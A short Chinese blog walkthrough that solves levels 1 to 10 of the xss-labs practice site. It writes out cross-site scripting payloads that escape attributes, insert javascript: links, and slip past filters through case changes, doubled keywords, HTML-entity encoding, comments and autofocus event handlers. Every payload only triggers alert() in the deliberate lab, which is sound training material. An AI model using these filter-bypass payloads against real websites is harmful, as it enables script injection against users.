xss-labs解答

下载xss-labs到www目录下

在xp上创建网站

需要访问时打开apchi和mysql

level-1

网络源代码

网页源码里是有个alert函数,触发就能通关

用< svg οnclick="alert(1)" >

level2

先随便数个1

用payload逃出这个引号内容,然后调用alert函数

" οnclick="alert(1)

点击框完成

level3

也随便输一个

变成了''答案改为''就行

level4

试试" οnclick="alert(1)

竟然行了

level5

继续用" οnclick="alert(1)发现onclick被破坏

换个方法"><a href="javascript:alert(1)">test</a>

创建一个超链接

点击test完成

level6

继续使用上一关方法

href被破坏,那就试试大小写

可以了😀

level7

这次更狠,给href和script给删掉了,大小写也没用

可以试试双拼"><a hrhrefef=javasscriptcript:alert()>test</a>

可以看到他只屏蔽了一个href和script

level8

加个链接发现又被破坏了

它在我们script的中间加了个_ ,那我们就把r和i换成编码

复制代码
javasc&#114;&#105;&#10;pt:alert()

level9

说我们链接不合法,就是链接不规范,加上http://

又被破坏,换成编码,因为要有http://,只有它失效才能执行JavaScript:alert()的弹窗效果,但是不能删了他,要利用它过掉过滤,用/* */把他注释掉

复制代码
javasc&#114;&#105;&#10;pt:alert()  /* http:// */

level10

发现没有框

都试一下

发现只有sort有用

复制代码
直接用t_sort=" onfocus="alert()" autofocus="" type="text自动聚焦套框
相关推荐
石山岭5 小时前
自己动手写了一个 Android 虚拟定位 App:GPSSimulate 技术实
android·前端
杉氧7 小时前
副作用 (Side Effects) 全攻略:如何像大师一样掌控 Composable 的生命周期?
android·架构·android jetpack
Kapaseker11 小时前
Kotlin Toolchain 0.11 发布:主要是把 Amper 干没了
android·kotlin
三少爷的鞋12 小时前
Android 现代架构不需要事件总线进阶篇
android
杉氧1 天前
深入理解 Compose 重组机制:快照系统如何驱动 UI 精准刷新?
android·架构·android jetpack
召钱熏1 天前
状态枚举正确≠渲染正确:一个语音按钮的状态机边界修复实录
android·前端
杉氧1 天前
深度解析:Jetpack Compose 核心架构与底层原理 —— 十年安卓老兵的“破茧重生”
android·架构·android jetpack
通玄1 天前
Jetpack Compose 入门系列(七):ViewModel 与界面状态管理
android
落魄Android在线炒饭1 天前
Android Framework 开发技巧:android.jar 生成与系统快速编译验证
android
如此风景1 天前
Kotlin Flow操作符学习
android·kotlin